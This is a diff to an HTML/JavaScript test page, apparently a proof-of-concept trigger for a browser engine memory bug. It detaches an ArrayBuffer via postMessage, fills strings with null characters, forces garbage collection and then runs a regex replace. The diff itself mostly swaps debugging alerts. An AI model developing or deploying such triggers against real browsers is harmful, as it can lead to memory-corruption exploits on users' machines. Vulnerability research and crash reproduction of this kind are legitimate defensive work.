--- a/string_no_crash.html
+++ b/string_no_crash.html
@@ -1,6 +1,6 @@
 <script>
 
-alert("start1");
+alert("start2");
 function neuter(ab) {
 
     postMessage("", "*", [ab]);
@@ -43,7 +43,7 @@ var y = "";
 var tmpy="";
 for(var i=0x0;i<0x10000/2;i++){
     if(i==0x500){
-    y+="\u0060\u0060";
+    y+="\u0000\u0000";
     }else{
     y+="\u0000\u0000";
     }
@@ -61,8 +61,6 @@ x+="1";
 x.substring(0,5);
 mystr.substring(0,5);
 y.substring(0,5);
-alert(y.length.toString(16));
-
 mystr=0;
 
 /* for(var i=0;i<array.length;i++){
@@ -87,10 +85,10 @@ array[i]=0;
 
 function myfunc(){
 
-//alert("to trigger");
+alert("before gc");
 
 gc();
-
+alert("after gc");
 eval("x.replace(/\\d/g, y)");
 
 alert("ok");
